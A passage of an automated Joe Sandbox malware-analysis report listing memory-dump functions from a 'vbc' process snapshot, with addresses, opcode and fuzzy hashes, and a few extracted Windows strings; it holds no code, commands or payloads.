                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: w
                                                                                                                                                  • API String ID: 0-476252946
                                                                                                                                                  • Opcode ID: 827116d927a1fc28ca579c54d9df50ee2514c1470d16ba009f0d9d71e1d7607a
                                                                                                                                                  • Instruction ID: 10ba78e37a1c6cada8b468741cc0c9de15e380488a63496238fdb095c125b036
                                                                                                                                                  • Opcode Fuzzy Hash: 827116d927a1fc28ca579c54d9df50ee2514c1470d16ba009f0d9d71e1d7607a
                                                                                                                                                  • Instruction Fuzzy Hash: 2AD1C070904219ABCB24CF55C481ABFFBB2FF84704F148859E99AD7641E335ED92D7A0
                                                                                                                                                  Function 05CE4C34 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                                                  • Instruction ID: ce13020c19cb1a956ccbc2a3858375214fff23ba764edcaba0baef3052c52938
                                                                                                                                                  • Opcode Fuzzy Hash: 89f527b55bfe7a4f0811dd71fcfc3e06bd55def568a9094adf0b6a96f076d154
                                                                                                                                                  • Instruction Fuzzy Hash: F2A13E75E05209AFDF19DFA8C8C0EBEB7B9FF58744F144829E911A7250E7749A40CB50
                                                                                                                                                  Function 05CC6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: e4bacbc02c46da18c9ea41489ff5e9f916301acb46c37f5debed4e7cebc40abf
                                                                                                                                                  • Instruction ID: 3d917a2e94c09458b561c94d37731287b12cc13347efad0f8ee261bacb2d643b
                                                                                                                                                  • Opcode Fuzzy Hash: e4bacbc02c46da18c9ea41489ff5e9f916301acb46c37f5debed4e7cebc40abf
                                                                                                                                                  • Instruction Fuzzy Hash: 21918871A40219AFDB21DF99CD89FAEBBB8EF04B50F100869F601AB191D774ED40DB64
                                                                                                                                                  Function 05CEE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                                  • Opcode ID: 56f17297a7bb7778a975b5050ce4611791d1ab7427c642fef368101f7440d876
                                                                                                                                                  • Instruction ID: a89ab3bb5b502f0077a5de9bdd937a99224eb9be5af489b531d12b889ac395cf
                                                                                                                                                  • Opcode Fuzzy Hash: 56f17297a7bb7778a975b5050ce4611791d1ab7427c642fef368101f7440d876
                                                                                                                                                  • Instruction Fuzzy Hash: 0291C231A00649ABDB22EFA5DC88FAFBB7EFF45794F100825F501A7250EB749941DB50
                                                                                                                                                  Function 05C7A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: GlobalTags
                                                                                                                                                  • API String ID: 0-1106856819
                                                                                                                                                  • Opcode ID: 06b4029341ec1235983eefecc061a37c76e6f24b6efe30b937c195c162592274
                                                                                                                                                  • Instruction ID: 35ef9e640c04b10efee9fdfbca423c5529c1112a2cd3f24014345d6bffa4d5d8
                                                                                                                                                  • Opcode Fuzzy Hash: 06b4029341ec1235983eefecc061a37c76e6f24b6efe30b937c195c162592274
                                                                                                                                                  • Instruction Fuzzy Hash: 54717075E04219DFEF28CF99D590AEDBBB2BF48700F14892EE806B7240D7B19981CB54
                                                                                                                                                  Function 05C5E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: EXT-
                                                                                                                                                  • API String ID: 0-1948896318
                                                                                                                                                  • Opcode ID: 792f5a77cf396c0a9c14a9d0a1fc7594178e2f524137dd962a2975e0692738fd
                                                                                                                                                  • Instruction ID: c45ad4189216dce9a6d73821f4cf43b6e8a8dd4ac52c2ec4fea739f4b8f026e5
                                                                                                                                                  • Opcode Fuzzy Hash: 792f5a77cf396c0a9c14a9d0a1fc7594178e2f524137dd962a2975e0692738fd
                                                                                                                                                  • Instruction Fuzzy Hash: E7419F72608301ABD710DAB5C884B6BB7ECAF88664F040D6DFD85E7140E674DB84D79A
                                                                                                                                                  Function 05C3CDEA Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: AlternateCodePage
                                                                                                                                                  • API String ID: 0-3889302423
                                                                                                                                                  • Opcode ID: d61157e8ef2b1d792e670ab7c265d63dcdfa01f34cdc67d51c4ff884fd422715
                                                                                                                                                  • Instruction ID: 0bbcc1b3726ac8233bdfce02d049ecb39090e9ed1ef4548d04ac8d3a8a9b1ddc
                                                                                                                                                  • Opcode Fuzzy Hash: d61157e8ef2b1d792e670ab7c265d63dcdfa01f34cdc67d51c4ff884fd422715
                                                                                                                                                  • Instruction Fuzzy Hash: 8941C372E00608ABDF28DB98CC89EFEB7B9FF44710F11496AE412E7250D6749B41CB50
                                                                                                                                                  Function 05CBC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: BinaryHash
                                                                                                                                                  • API String ID: 0-2202222882
                                                                                                                                                  • Opcode ID: a2ba278f72a2c0d03900385f5b2be91cd9f33cd7bed449723eb6296b0361c422
                                                                                                                                                  • Instruction ID: c12fbfed40dfb606ebc41a201afd71439d30212dd7998e1136451f6c21952954
                                                                                                                                                  • Opcode Fuzzy Hash: a2ba278f72a2c0d03900385f5b2be91cd9f33cd7bed449723eb6296b0361c422
                                                                                                                                                  • Instruction Fuzzy Hash: 494157F1D0012DABEF21DA54CC88FEEB77CAB44718F0049A5E609AB140DB719E89CF94
                                                                                                                                                  Function 05CC07C3 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Ek<
                                                                                                                                                  • API String ID: 0-1051670545
                                                                                                                                                  • Opcode ID: 37ab11a5bb25036c66367d0a87e10bd4f5eb36ca6e7e8c761ab7950ab4c774ac
                                                                                                                                                  • Instruction ID: 1ddda6e8f733fabc43644d9531f8df746bd88f73614c7ed517572ae8b47b913c
                                                                                                                                                  • Opcode Fuzzy Hash: 37ab11a5bb25036c66367d0a87e10bd4f5eb36ca6e7e8c761ab7950ab4c774ac
                                                                                                                                                  • Instruction Fuzzy Hash: 62418071608311DBD720DF28C849B9BBBE8FF88614F004E2EF598D7251DB709904DB92
                                                                                                                                                  Function 05CBCCA0 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: TrustedInstaller
                                                                                                                                                  • API String ID: 0-565535830
                                                                                                                                                  • Opcode ID: eca22cfbee79ad54e38bd0d8c082f5874137d69d1ecce3326c5eb88e303415a9
                                                                                                                                                  • Instruction ID: 1f4459f9df2dd7a1fa3d9520a8420f7781fdcc3a501c249300e0417cce898a5d
                                                                                                                                                  • Opcode Fuzzy Hash: eca22cfbee79ad54e38bd0d8c082f5874137d69d1ecce3326c5eb88e303415a9
                                                                                                                                                  • Instruction Fuzzy Hash: 8B319436A40259BFDB22ABE4CC45FEFBB79EF44B50F010965FA00AB150D6749E41D790
                                                                                                                                                  Function 05CE0F50 Relevance: 1.3, Strings: 1, Instructions: 99COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: @
                                                                                                                                                  • API String ID: 0-2766056989
                                                                                                                                                  • Opcode ID: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                                                                                  • Instruction ID: 4bfca87c908a2b0000372639a196c8e2295f70fad89172d8f52ad7fe11df8b25
                                                                                                                                                  • Opcode Fuzzy Hash: 82e9b14cf91a5a6f37c9e4009f2ae5fbb7a03b243ebd8f8edba72d545418d4d2
                                                                                                                                                  • Instruction Fuzzy Hash: C331A1B1118385AFD311DF14C849EABBBE8FF84754F444E2EB59487190E7B0EA48CB92
                                                                                                                                                  Function 05C68CB1 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: WindowsExcludedProcs
                                                                                                                                                  • API String ID: 0-3583428290
                                                                                                                                                  • Opcode ID: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                                                                  • Instruction ID: c709633fb35e6ac3d6ea96f784ad8bf6d95eae16400dc64926fb1b7455af6240
                                                                                                                                                  • Opcode Fuzzy Hash: 34a5547e051765790c2c8ceff76a078c61e809f66b40f98c98d16d0ff40d25f6
                                                                                                                                                  • Instruction Fuzzy Hash: 72210A37604116ABCB22DA95C884F6F7BFDBF55AA4F054C22B9069B114D638DF0187B1
                                                                                                                                                  Function 05CF6FF7 Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Strings
                                                                                                                                                  • Critical error detected %lx, xrefs: 05CF7027
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID: Critical error detected %lx
                                                                                                                                                  • API String ID: 0-802127002
                                                                                                                                                  • Opcode ID: 98cb08d7f8cf451beea5ac149437d90c719c6fb527795e5781467317d3227895
                                                                                                                                                  • Instruction ID: 569d924d08f2fd0023467b5e69afbc8f17d35e994bf1b3505831d79c9bc0c959
                                                                                                                                                  • Opcode Fuzzy Hash: 98cb08d7f8cf451beea5ac149437d90c719c6fb527795e5781467317d3227895
                                                                                                                                                  • Instruction Fuzzy Hash: 6E113976E143489BDB25DFA4D406BEDBBF1EB04718F20492ED156AB281D7750601CF14
                                                                                                                                                  Function 05CE2000 Relevance: .8, Instructions: 757COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 81004c522c1adea372532088f6edc7b360147687750f384bb461dde86c6a82d0
                                                                                                                                                  • Instruction ID: 29e5043636a90f3c3f01a204c7e6791584b82b7525283204b060d93641eded5a
                                                                                                                                                  • Opcode Fuzzy Hash: 81004c522c1adea372532088f6edc7b360147687750f384bb461dde86c6a82d0
                                                                                                                                                  • Instruction Fuzzy Hash: 7142AD7A6083419BDB25CF69C890B7FB7EABF88700F480D2DF98297250D671DA45CB52
                                                                                                                                                  Function 05CD8158 Relevance: .6, Instructions: 617COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 4aa78daf9f17bc91401eefd45fd56f7a5b16b0289a908a6b6ddcb8de27645c94
                                                                                                                                                  • Instruction ID: 069059b122f9a4561eb0ce26a4b4a1df09fa215b2f127640fa3838ae274520c1
                                                                                                                                                  • Opcode Fuzzy Hash: 4aa78daf9f17bc91401eefd45fd56f7a5b16b0289a908a6b6ddcb8de27645c94
                                                                                                                                                  • Instruction Fuzzy Hash: 41425B75A002199FDB24CF69C881BADF7F6FF48310F15859AE949EB241D734AA81CF60
                                                                                                                                                  Function 05CEA118 Relevance: .6, Instructions: 591COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 91d95a3464ba23470a3224f60f472e251afafe76965521e6ac4958f6aaae420d
                                                                                                                                                  • Instruction ID: 2de50b97ddf7b3b8800a7b7a02b1e29adab7d73abdb733bda114cb97df6b92a3
                                                                                                                                                  • Opcode Fuzzy Hash: 91d95a3464ba23470a3224f60f472e251afafe76965521e6ac4958f6aaae420d
                                                                                                                                                  • Instruction Fuzzy Hash: E122A1742086518FDB24CF2AC898772B7F2BF45300F188C5AE8978F685D735D692DB60
                                                                                                                                                  Function 05C68DBF Relevance: .6, Instructions: 554COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 49e4ef0b075cd38042ec1fd6ce47946cd11db93a6e979a535a8ede30c1cf4844
                                                                                                                                                  • Instruction ID: e8e354f9c62f5b856b788298dfef522c95e946588088eb2615d216eb67edd623
                                                                                                                                                  • Opcode Fuzzy Hash: 49e4ef0b075cd38042ec1fd6ce47946cd11db93a6e979a535a8ede30c1cf4844
                                                                                                                                                  • Instruction Fuzzy Hash: B2224D75E0421ADBCB15CF95C4809BEFBF2FF48704B54886AE8469B641E734DE81DBA0
                                                                                                                                                  Function 05C465D0 Relevance: .4, Instructions: 383COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9dfc6df2739d1d9be7c23efae838761a2e191b60ddfcbdda6213ab166980e7e9
                                                                                                                                                  • Instruction ID: 5b43344ad5bd1581d39ecfd001e7ed6ac7b82024fd994453d65466cce4da9d31
                                                                                                                                                  • Opcode Fuzzy Hash: 9dfc6df2739d1d9be7c23efae838761a2e191b60ddfcbdda6213ab166980e7e9
                                                                                                                                                  • Instruction Fuzzy Hash: DAE15B716083418FC714CF28C490E6ABBE1BF8A318F158E6DE9958B355DB31EA85CF91
                                                                                                                                                  Function 05C38397 Relevance: .4, Instructions: 380COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: bb3cf6124d819e5f04194c815c3a6ec1f16de6483e964c54ace5762dcf31e19f
                                                                                                                                                  • Instruction ID: 3423e0045cdff495db0eb99ea83c88e6cdd0a24d9bed8aae3dc6b8a3be1bd5a8
                                                                                                                                                  • Opcode Fuzzy Hash: bb3cf6124d819e5f04194c815c3a6ec1f16de6483e964c54ace5762dcf31e19f
                                                                                                                                                  • Instruction Fuzzy Hash: FED1C57170520AABCF18DF65C896EBA77B6FF44308F044929F956DB280E734EA45CB50
                                                                                                                                                  Function 05C6EF28 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: e552200edcca0e7f1ce35b6b7605bd7bece5418db7627ce568e8ead6f428b89c
                                                                                                                                                  • Instruction ID: 2a6b38e5d731af70bf5963ea2b6826f39974da6a7ab4a9906e45b5bbead2475b
                                                                                                                                                  • Opcode Fuzzy Hash: e552200edcca0e7f1ce35b6b7605bd7bece5418db7627ce568e8ead6f428b89c
                                                                                                                                                  • Instruction Fuzzy Hash: D4E10375E04608DFCB25CFA9D984AADBBF2FF48314F14492EE946A7264D770AA41CF10
                                                                                                                                                  Function 05CC8243 Relevance: .3, Instructions: 322COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction ID: 22b4da857a97d15187b477a2912a5285bc5cdb780c9ecbfcdf6b99cab5109974
                                                                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                                                  • Instruction Fuzzy Hash: C6B15174B00608AFDF24DB95C944EABBBBAFF84304F14589EE94397790DA34EA45DB10
                                                                                                                                                  Function 05C50535 Relevance: .3, Instructions: 300COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction ID: 98699b285af5844a70201109e8fdd81555c61f899a176bf5e6fc189914df68b3
                                                                                                                                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                                                  • Instruction Fuzzy Hash: 72B12632704646AFDB15CBA4C888BBEBBF6BF44314F144D58D942E7281DB70DA81DB94
                                                                                                                                                  Function 05C60DE1 Relevance: .3, Instructions: 295COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 8414e939331b54ecf330039c411ec1498719064a5af810d6ca0e3203dfae7b04
                                                                                                                                                  • Instruction ID: feaf5e3dee5b214fcc4d33465c27134a6f339d26b5f0cb4bfb05c1a997e32820
                                                                                                                                                  • Opcode Fuzzy Hash: 8414e939331b54ecf330039c411ec1498719064a5af810d6ca0e3203dfae7b04
                                                                                                                                                  • Instruction Fuzzy Hash: A4C14D75E0425ADFDB15CFD9C888AADBBB6FF48344F10492AE405BB355E770AA81CB40
                                                                                                                                                  Function 05C483C0 Relevance: .3, Instructions: 281COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 3de906fc6f87bd2e769be28f281601fdd26f2276e2d87c9ace03ea72635d7080
                                                                                                                                                  • Instruction ID: 5e780638b6eeaee3169f1c28c4ce34064cc9fa124fbd51997d8ffa7008a9cfb9
                                                                                                                                                  • Opcode Fuzzy Hash: 3de906fc6f87bd2e769be28f281601fdd26f2276e2d87c9ace03ea72635d7080
                                                                                                                                                  • Instruction Fuzzy Hash: 45C159756083818FE764CF15C494BAABBE5FF88708F444D6DE98A87290D774EA04CF92
                                                                                                                                                  Function 05C3C427 Relevance: .3, Instructions: 280COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 821a44908d52becc38f521c7600c08e7f28210cf4d4fe49d02ebcb2c600a4671
                                                                                                                                                  • Instruction ID: 76caedd44c3e34ffa3afc3778faddc0c4e1b26437c05f9cf936089bddd6bad25
                                                                                                                                                  • Opcode Fuzzy Hash: 821a44908d52becc38f521c7600c08e7f28210cf4d4fe49d02ebcb2c600a4671
                                                                                                                                                  • Instruction Fuzzy Hash: 80B16F70B042698BDB64DF65C895BBDB3B2EF44704F1089EAD50AA7240EB70DEC5DB20
                                                                                                                                                  Function 05C6E5E7 Relevance: .3, Instructions: 278COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: a169011de1897c6bdb85f7806fe2bf6892dd8117845bdee1b44013b6da7e0562
                                                                                                                                                  • Instruction ID: 394116e20bc6c4342c11680972dce466c1c2e803b573fd122f54d8c1bc8a5b2f
                                                                                                                                                  • Opcode Fuzzy Hash: a169011de1897c6bdb85f7806fe2bf6892dd8117845bdee1b44013b6da7e0562
                                                                                                                                                  • Instruction Fuzzy Hash: 2FA13C3AE042599FEB21DB59D888FBE7FB9BF00718F050916E901AB290D7749F40C795
                                                                                                                                                  Function 05C80185 Relevance: .3, Instructions: 276COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.1798598072.0000000005C10000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C10000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_6_2_5c10000_vbc.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 25d10230da21cb86749f75200b57267fd413a4f6a69581e9e3a4d4380be760c9
                                                                                                                                                  • Instruction ID: d59ed0d13c01a1267d59d4a363bbccd67d2e2da49c9e19f870577a10d3b2ccc3
